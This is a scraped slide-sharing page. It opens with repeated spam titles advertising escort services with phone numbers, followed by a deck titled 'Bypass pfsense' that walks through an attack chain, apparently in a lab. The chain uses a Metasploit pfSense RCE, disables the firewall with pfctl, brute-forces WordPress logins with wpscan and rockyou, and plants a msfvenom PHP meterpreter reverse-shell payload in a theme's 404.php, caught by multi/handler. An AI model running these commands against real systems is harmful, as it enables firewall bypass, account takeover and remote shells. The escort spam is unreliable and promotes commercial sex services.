Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneRussian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 
Radiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsRadiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girls
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
 
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Gram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of indiaGram Darshan PPT cyber rural in villages of india
Gram Darshan PPT cyber rural in villages of india
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
 

Bypass pfsense

  • 1.
  • 2. 1
  • 3. 2
  • 4. 3 WPSCAN WPScan is a black box WordPress vulnerability scanner Tools
  • 6. Title and Content Layout with List • Add your first bullet point here • Add your second bullet point here • Add your third bullet point here 5
  • 7. ? A free and open source operating system for routers and firewalls Can be installed on a physical computer or a virtual machine to make a dedicated firewall/router for a network Configured as DHCP server, DNS server, WIFI access point, VPN server, all running on the same hardware device. 6
  • 8. 7
  • 9. Looking for the PfSense’s exploit 8
  • 10. pfSense authenticated graph status RCE Looking for the PfSense’s exploit 8 Tricking an authenticated admin into interacting with a specially crafted webpage Click jacking Vulnerability In CSRF Error Page pfSense PfSense authenticated graph status RCE A non-administrative authenticated attacker can inject arbitrary operating system commands and execute them as the root user PfSense authenticated group member RCE A remote command execution vulnerability post authentication in the system_groupmanager.php page
  • 12. Change the exploit’s options 9 Rhost = IP address of PFSENSE Lhost = IP address of KALI
  • 14. Get the internal address of Pfsense 10
  • 15. Ping & scan the internal address of PFSENSE 11  Nmap –sP @ip Ping Scan ip LAN pfsense
  • 16. Can't reach the internal IP of the firewall 12
  • 19. Disable the rules of PFSENSE 15 Pfctl –d Disable the packet filter
  • 20. Change the default administrator password of PFSENSE 16
  • 21. Ping the internal IP address 17
  • 22. Scan with nmap both the Ubuntu & PfSense 18
  • 23. we can ping the internal IP of pfsense And by nmap we found Now we can ping the internal IP of pfsense And by nmap we have found that both PFSENSE and UBUNTU are UP !!! 19
  • 24. 20
  • 25. we can ping the internal IP of pfsense And by nmap we found Scan WordPress version with Wpscan 21  Wpscan –url The url of the blog to scan
  • 26. we can ping the internal IP of pfsense And by nmap we found Scan WordPress version with Wpscan 22
  • 27. Enumerate WordPress Usernames 23  Wpscan –url http://x.x.x.x -e u enumerate users
  • 29. Brut force attack using Wpscan 25 rockyou wordlist: is a password dictionary that exist by default in kali linux
  • 30. Brut force attack using Wpscan 26  Wpscan –url http://x.x.x.x –U admin –P /usr/share/wordlists/rockyou.txt username and list of password to use during the attack
  • 31. Generate malicious PHP script 27 msfvenom is a combination of : • msfpayload (generate a payload in a specified format ) • msfencode (encode and obfuscate the payload using various algorithms)  Msfvenom –p php/meterpreter/reverse_tcp lhost=@kali lport=4444 –f raw payload to use format
  • 32. Connect to Wordpress & Paste the PHP script under 404,php template 28
  • 33. ss Load Metasploit and start multi/handler  Use exploit/multi/handler a stub that handles exploits launched outside of the framework. 29
  • 34. we can ping the internal IP of pfsense And by nmap we found THANK YOU FOR YOUR TIME